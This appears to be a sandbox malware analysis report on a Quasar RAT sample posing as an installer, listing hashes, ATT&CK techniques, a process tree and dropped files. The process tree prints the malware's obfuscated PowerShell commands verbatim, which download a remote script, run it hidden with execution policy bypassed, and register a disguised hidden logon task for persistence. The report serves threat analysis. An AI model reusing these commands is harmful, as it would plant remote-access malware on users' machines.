quasar | bfa990bda3eebc658bcd0014dbfc9d57277e585548031f7ce4ecfcc8223f7b6b

Analysis

max time kernel
149s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20250410-en
resource tags

arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system
submitted
19/04/2025, 15:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Installer.exe
Size

53KB
MD5

f323bb458ecbd21acdddd5ea770e775f
SHA1

9b04a6ea2e6efcc81d344f6425928c5700e9a3f6
SHA256

4030427f5e93a3cbb5072fe12afb02a4cb6447a4d0061b4dc9f71fdb783ab926
SHA512

ca08182341611a89da1f4c90efbd065691a551e68d534ed509bf3ffca8d821362be14b175cfb8378fc2199432938c1d3e63524d9424802a37c0435467a5dabe2
SSDEEP

768:ZId0rRueeCTXZJa0CMpWBUlNP/hA8OE2fbsE/g0+EFiRs:ZId+KQXZPCiWBU8fAL5eim

Score

10^/10

quasar execution spyware trojan

Malware Config

Extracted

Family

quasar

��:a>՘�后��s��6�F�l濺�,@ 3&�

Attributes

encryption_key
0A2600918F5E13281DD3F3E3CF35CA2FEACB6884
reconnect_delay
3000
startup_key
�� D��s�+��\� r8t$�

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/1912-56-0x000001CF98630000-0x000001CF987BE000-memory.dmp	family_quasar

Blocklisted process makes network request 35 IoCs

flow	pid	Process
6	1868	powershell.exe
8	1912	powershell.exe
9	1912	powershell.exe
10	1912	powershell.exe
24	1912	powershell.exe
25	1912	powershell.exe
26	1912	powershell.exe
27	1912	powershell.exe
11	1912	powershell.exe
12	1912	powershell.exe
28	1912	powershell.exe
13	1912	powershell.exe
29	1912	powershell.exe
15	1912	powershell.exe
30	1912	powershell.exe
16	1912	powershell.exe
17	1912	powershell.exe
31	1912	powershell.exe
32	1912	powershell.exe
18	1912	powershell.exe
19	1912	powershell.exe
20	1912	powershell.exe
21	1912	powershell.exe
22	1912	powershell.exe
23	1912	powershell.exe
33	1912	powershell.exe
34	1912	powershell.exe
35	1912	powershell.exe
36	1912	powershell.exe
37	1912	powershell.exe
38	1912	powershell.exe
39	1912	powershell.exe
40	1912	powershell.exe
41	1912	powershell.exe
42	1912	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3124	powershell.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1912	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3124	powershell.exe
3124	powershell.exe
1868	powershell.exe
1868	powershell.exe
1912	powershell.exe
1912	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	1760	Installer.exe
Token: SeBackupPrivilege	1760	Installer.exe
Token: SeDebugPrivilege	1760	Installer.exe
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeIncreaseQuotaPrivilege	3124	powershell.exe
Token: SeSecurityPrivilege	3124	powershell.exe
Token: SeTakeOwnershipPrivilege	3124	powershell.exe
Token: SeLoadDriverPrivilege	3124	powershell.exe
Token: SeSystemProfilePrivilege	3124	powershell.exe
Token: SeSystemtimePrivilege	3124	powershell.exe
Token: SeProfSingleProcessPrivilege	3124	powershell.exe
Token: SeIncBasePriorityPrivilege	3124	powershell.exe
Token: SeCreatePagefilePrivilege	3124	powershell.exe
Token: SeBackupPrivilege	3124	powershell.exe
Token: SeRestorePrivilege	3124	powershell.exe
Token: SeShutdownPrivilege	3124	powershell.exe
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeSystemEnvironmentPrivilege	3124	powershell.exe
Token: SeRemoteShutdownPrivilege	3124	powershell.exe
Token: SeUndockPrivilege	3124	powershell.exe
Token: SeManageVolumePrivilege	3124	powershell.exe
Token: 33	3124	powershell.exe
Token: 34	3124	powershell.exe
Token: 35	3124	powershell.exe
Token: 36	3124	powershell.exe
Token: SeIncreaseQuotaPrivilege	3124	powershell.exe
Token: SeSecurityPrivilege	3124	powershell.exe
Token: SeTakeOwnershipPrivilege	3124	powershell.exe
Token: SeLoadDriverPrivilege	3124	powershell.exe
Token: SeSystemProfilePrivilege	3124	powershell.exe
Token: SeSystemtimePrivilege	3124	powershell.exe
Token: SeProfSingleProcessPrivilege	3124	powershell.exe
Token: SeIncBasePriorityPrivilege	3124	powershell.exe
Token: SeCreatePagefilePrivilege	3124	powershell.exe
Token: SeBackupPrivilege	3124	powershell.exe
Token: SeRestorePrivilege	3124	powershell.exe
Token: SeShutdownPrivilege	3124	powershell.exe
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeSystemEnvironmentPrivilege	3124	powershell.exe
Token: SeRemoteShutdownPrivilege	3124	powershell.exe
Token: SeUndockPrivilege	3124	powershell.exe
Token: SeManageVolumePrivilege	3124	powershell.exe
Token: 33	3124	powershell.exe
Token: 34	3124	powershell.exe
Token: 35	3124	powershell.exe
Token: 36	3124	powershell.exe
Token: SeIncreaseQuotaPrivilege	3124	powershell.exe
Token: SeSecurityPrivilege	3124	powershell.exe
Token: SeTakeOwnershipPrivilege	3124	powershell.exe
Token: SeLoadDriverPrivilege	3124	powershell.exe
Token: SeSystemProfilePrivilege	3124	powershell.exe
Token: SeSystemtimePrivilege	3124	powershell.exe
Token: SeProfSingleProcessPrivilege	3124	powershell.exe
Token: SeIncBasePriorityPrivilege	3124	powershell.exe
Token: SeCreatePagefilePrivilege	3124	powershell.exe
Token: SeBackupPrivilege	3124	powershell.exe
Token: SeRestorePrivilege	3124	powershell.exe
Token: SeShutdownPrivilege	3124	powershell.exe
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeSystemEnvironmentPrivilege	3124	powershell.exe
Token: SeRemoteShutdownPrivilege	3124	powershell.exe
Token: SeUndockPrivilege	3124	powershell.exe
Token: SeManageVolumePrivilege	3124	powershell.exe
Token: 33	3124	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1912	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1760 wrote to memory of 3520	1760	Installer.exe	79
PID 1760 wrote to memory of 3520	1760	Installer.exe	79
PID 3520 wrote to memory of 252	3520	cmd.exe	80
PID 3520 wrote to memory of 252	3520	cmd.exe	80
PID 252 wrote to memory of 5660	252	winAPI.dll	81
PID 252 wrote to memory of 5660	252	winAPI.dll	81
PID 5660 wrote to memory of 1360	5660	cmd.exe	82
PID 5660 wrote to memory of 1360	5660	cmd.exe	82
PID 1360 wrote to memory of 5960	1360	cmd.exe	83
PID 1360 wrote to memory of 5960	1360	cmd.exe	83
PID 1360 wrote to memory of 3124	1360	cmd.exe	84
PID 1360 wrote to memory of 3124	1360	cmd.exe	84
PID 1360 wrote to memory of 1868	1360	cmd.exe	86
PID 1360 wrote to memory of 1868	1360	cmd.exe	86
PID 1360 wrote to memory of 1912	1360	cmd.exe	87
PID 1360 wrote to memory of 1912	1360	cmd.exe	87
PID 1912 wrote to memory of 6108	1912	powershell.exe	88
PID 1912 wrote to memory of 6108	1912	powershell.exe	88
PID 6108 wrote to memory of 1984	6108	csc.exe	89
PID 6108 wrote to memory of 1984	6108	csc.exe	89

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5960	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\Installer.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c winAPI.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3520
- - C:\Users\Admin\AppData\Local\Temp\winAPI.dll
    winAPI.dll
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:252
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5660
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1360
      - C:\Windows\system32\attrib.exe
        
        attrib +h "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache"
        6⤵
        Views/modifies file attributes
        
        PID:5960
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoPr"o"file -Execu"t"ionPolic"y" Byp"a"ss -Windo"w"Style Hid"d"en -Com"m"and "$action = New-ScheduledT"a"skAction -Execute 'powershell.exe' -Argument '-NoProfile -Exe"c"utionPo"l"icy B"y"pass -Wind"o"wStyle Hidden -File \"C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1\"'; $trigger = New-ScheduledTaskTrigger -AtLogOn -User $env:USERNAME; $settings = New-ScheduledTaskSettingsSet -Hidden -DontStopIfGoingOnBatteries; $principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive; Register-ScheduledTask -TaskName 'Micro"s"oftEdge"U"pdat"e"Task' -Action $action -Trigger $trigger -Settings $settings -Principal $principal -Force | Out-Null"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3124
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoPr"o"file -Exe"c"utionPol"i"cy By"p"ass -Win"d"owStyle H"i"dd"e"n -Co"m"mand "Invo"k"e-W"e"bRequ"e"st 'ht"t"ps://"f"iles."c"atbo"x".moe/92nbzf.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1' -Use"B"asicParsing"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:1868
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -N"o"Profi"l"e -Execu"t"ionPol"i"cy Bypa"s"s -WindowSt"y"le Hi"d"den -Fi"l"e "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1912
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\34wmwngi\34wmwngi.cmdline"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:6108
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9F77.tmp" "c:\Users\Admin\AppData\Local\Temp\34wmwngi\CSCE25B0F264FAA43409E183E13606E9E17.TMP"
        8⤵
        
        PID:1984

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4dcb591f64c5a200feded5b3963da678

SHA1
77c4941ac998d3cc3e55f74b0a152b7138e2fb67

SHA256
1fbd242d477324cd00b4eca95abe8d353ce7fb4898e7fcbd8b579c48dfb598b7

SHA512
08d81df9bbfea221341f7d79dab541957b618a2690657b3448b5ffb9f4e5b4b2eb4ea00188e6a071aa41e09e38c2242299c8f0027261a39cece900fc09a4dce3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
23dc444af1c77687ac4b9e31e692998b

SHA1
2386191cd501c84d6046215259435c0f863bc498

SHA256
c7c9775b8bc60f57e7e9e66f01b44070d2b8e226b792a6b727e689bddc80bbf8

SHA512
b4ffdcdff4d667f9760f75d750576c4acf7c9e607597ab173dae0e6fc47ce37ef776ddf7af86fcd355765b32710a990c784b2e034e3841b9ca0bf5974272c66b

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.bat

Filesize
1KB

MD5
56ed4e1fbde1df51fb37b6677265ec3d

SHA1
6dc4cf3ebe6c0043c6fca9b5c9c46a3f5a492d17

SHA256
d65e44cd5593e4f8d380c23516e94db3b18e9a5c42ef40697beb2a611aaa9204

SHA512
c9c037b3713d2774301a4d68beee7c528fd2ade5aac95f06c82b1ef9f23ba47ec316cfc0d711fd773c8c81fd33366537395daee361325c5465cf02eb6dae41c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\34wmwngi\34wmwngi.dll

Filesize
3KB

MD5
677ef367c1e9980ca2c0f79e47a6a546

SHA1
8a500cb64939e62c29f7a6a865a63991a3f73a28

SHA256
44a46063d8d4043f7b302aa24413e8b3407abc0519926fa05547759d8b4142c6

SHA512
a0052d695c4ee25ac1621f4e12b467bacf21bb45ccc8ff91070da1aa9fbc8f575bce6f0c4bcc758af36063943f4f6a7db7ac8675420de0af34557815a3890cd2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9F77.tmp

Filesize
1KB

MD5
0bb19c2475c4013f085ae2abfa1c26f0

SHA1
ee8ae584e8cca38bd888fb195d07bf523091f0a7

SHA256
396276d839acb65b2bbf0a7fade75852fe36f46f2a4f3e04a6fc88d408a1fdd9

SHA512
0a6a54ced8c897344dc4dbbfcd8f54fc7d4d9cb2e0679e83e9a6feb4f5555ca65b0fb00c3492ebbb1c0170fbc16bee24387e2987b700bd6362b87f0502b7bdeb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lcbgxni0.h5t.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\UDCache\task.ps1

Filesize
7.0MB

MD5
f46cd513598c2b1ffb63fe501301dd64

SHA1
d1d71cfdc9ea551470478b2452d0e451b8d055e8

SHA256
e8d38cba909fb2374dc0a406fcc0c4360ffb12ba5d588856690e7e06657e6df5

SHA512
bbd43f0f9b7eddc0857ac14339859e0e6b756de8749e54795d86bcdb580d6bf369a5a4050231bf1bdb361ff817907175180f04f352df2e35fce63fbeb4f91974

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\34wmwngi\34wmwngi.0.cs

Filesize
938B

MD5
5b328f64341f326554c2d3c08ace5f93

SHA1
25a9aad6022782e5200d410aa9ff8e707ee2eb1a

SHA256
6e7a0c2174ae7882e6bd3f4afdf0438b982649021048df980b08c5ac948a01b9

SHA512
d4116697a54bc21a8d77aaa8eeafa95d60b6873073f2294d027829a83dc82bf39d63f08464b7622dcfd4ec3a1991b6225f72399321a5f93582d84387088badd0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\34wmwngi\34wmwngi.cmdline

Filesize
369B

MD5
885fed21b6ef85a5b2998b9b574e68f8

SHA1
c272402ec32a1aa185748879301197e541f6418e

SHA256
c13a6b8396ceac1f69c0c3a54206b812d2cdd3b9cea7c0596ce5a0a11f3ca082

SHA512
f9e988bbdbd55ac4383d0fab3e60dc76b8d03a1013f099f23448b97375a4dc101dbbb9bc77ecb74861807e5cea0d6b5a25da2fb58dc52df90c6f3f2a805e2c61

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\34wmwngi\CSCE25B0F264FAA43409E183E13606E9E17.TMP

Filesize
652B

MD5
3c997d093728dce603a25bb8d5de1b08

SHA1
3dd98b508932530084a6290334007ff92b9e1df0

SHA256
c18e3f4766b3d2f347a91d305ae758b1bfe5806bcc6164f11f0ef36f47109761

SHA512
f5510dbf3cc2bbc7c9b4e9df798c89c4b0186de98ec6c8f3ded01da848573cf3d8a7ff8059b4dfcac947dffa95301bf3842608082707243c292682fedf997c6a

Download Submit
memory/1760-27-0x0000000210040000-0x0000000210346000-memory.dmp

Filesize
3.0MB

Download
memory/1760-0-0x0000000210040000-0x0000000210346000-memory.dmp

Filesize
3.0MB

Download
memory/1760-25-0x0000000100400000-0x000000010040D000-memory.dmp

Filesize
52KB

Download
memory/1912-61-0x000001CFFA660000-0x000001CFFA712000-memory.dmp

Filesize
712KB

Download
memory/1912-56-0x000001CF98630000-0x000001CF987BE000-memory.dmp

Filesize
1.6MB

Download
memory/1912-54-0x000001CF98020000-0x000001CF9818A000-memory.dmp

Filesize
1.4MB

Download
memory/1912-57-0x000001CF984B0000-0x000001CF984CA000-memory.dmp

Filesize
104KB

Download
memory/1912-60-0x000001CFFA550000-0x000001CFFA5A0000-memory.dmp

Filesize
320KB

Download
memory/1912-62-0x000001CF98CB0000-0x000001CF98CFE000-memory.dmp

Filesize
312KB

Download
memory/1912-52-0x000001CF98000000-0x000001CF98008000-memory.dmp

Filesize
32KB

Download
memory/1912-65-0x000001CF98600000-0x000001CF9862A000-memory.dmp

Filesize
168KB

Download
memory/1912-64-0x000001CF98D50000-0x000001CF98D9A000-memory.dmp

Filesize
296KB

Download
memory/1912-63-0x000001CF98D00000-0x000001CF98D4C000-memory.dmp

Filesize
304KB

Download
memory/1912-59-0x000001CF985C0000-0x000001CF985FA000-memory.dmp

Filesize
232KB

Download
memory/1912-58-0x000001CF985B0000-0x000001CF985C2000-memory.dmp

Filesize
72KB

Download
memory/3124-12-0x0000024EB7E60000-0x0000024EB7E82000-memory.dmp

Filesize
136KB

Download